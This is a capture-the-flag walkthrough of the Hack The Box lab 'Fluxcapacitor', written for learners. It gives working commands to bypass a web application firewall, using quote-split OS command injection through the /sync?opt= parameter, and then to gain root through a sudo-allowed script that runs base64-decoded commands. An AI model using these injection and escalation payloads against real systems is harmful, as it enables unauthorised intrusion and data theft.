Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Fluxcapacitor of Hack The Box. Solving this lab is not much easy, all you need is your web penetration testing skill to solve this challenge. This lab is designed to bypass Web Application Firewall (WAF) for exploiting OS command injection vulnerability in this machine.
Task: Find the user.txt and root.txt in the vulnerable Lab.
These labs are only available online, therefore, they have a static IP. Fluxcapacitor has IP: 10.10.10.69.
As we knew the initial stage is enumeration; therefore use nmap version scan for gathering target’s machine and running services information.
nmap -sV 10.10.10.69
So from its scanning result, it told us that port 80 is open for web services and also protected by web application firewall “superWAF” thus we explored target IP in the web browser but found nothing interesting.
Then we look into its source code and saw an exciting comment which was pointing towards URL: /sync, and without wasting time we open /sync in URL.
LOL!!! It gave 403 forbidden error message and something openresty/22.214.171.124 then we looked into Google for any exploit related to this but failed to find any working exploit against it.
At the moment, we decided to use burp suite for intercepting our browser request. So after intercepting the Http request, the raw information is sent to the repeater.
Huhhhh!! It was responding same output as was in the web browser. Might be there would be some chances of WAF filter restriction on User-Agent such as Mozilla Firefox/5.0.
So we start scrutiny for User-Agent field by replacing original user-agent content from “raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in the source code of the home page.
Now it was confirmed that there was SuperWAF filter against the user-agent field, therefore, we try to search its exploit in Google but we didn’t find any particular exploit. Nevertheless, Google gave a little hint for OS command injection and on the bases of that, we try few parameters within Http Header such as /sync?test=ls which response with the same timestamp every time. Hence we need to fuzz proper directory, therefore, we will use wfuzz in our next step.
So we use common.txt wordlist for URL brute force and execute below command.
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19
It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the response.
Now use ‘opt’ parameter to bypass WAF and execute ls command through it, HOWEVER again there is a trick to execute ls command. Because WAF will not allow you to perform OS command injection directly, therefore, it will be a little bit tougher to exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for exploiting OS command injection which is known as string literal concatenation from this website, means that adjacent string literals are concatenated, without any operator.
We took help from that website which I have mentioned above and execute three commands: whoami, id, uname through curl as shown in image.
curl "http://10.10.10.69/sync?opt=' whoami' " curl "http://10.10.10.69/sync?opt=' id'" curl "http://10.10.10.69/sync?opt=' u'n'ame -a' "
Superb!! It was great to know that we have bypassed WAF successfully, but still the task is not completed yet.
Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me, still, it is not easy to bypass WAF even if your goal is near. Seriously we put great efforts and at last found user.txt when executed below commands.
curl "http://10.10.10.69/sync?opt=' l's' /home'" curl "http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'" curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"
Now the goal was root.txt file and taking a lesson from the previous experience I choose to run sudo -l command to check the sudo privileges of the current user.
curl "http://10.10.10.69/sync?opt=' sudo -l'"
Awesome!! It told us that we can run a script “monit” with root privileges without using password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat command.
curl "http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''"
After reading .monit file, we concluded that the script takes two parameter i.e. cmd string and base64 decoding which will match the conditions according to it and passes the final result to bash -c as parameter.
Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode base64 value for that reason first we generated base64 value for /root/root.txt because we were well aware of the location of the root.txt file from our previous challenges.
echo "cat /root/root.txt" | base64
Now with the help of sudo privilege execute the command to gain root access and complete the task by grabbing root.txt
curl "http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='"
HURRAYYYY!!! We hit the goal and successfully found the root.txt file.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here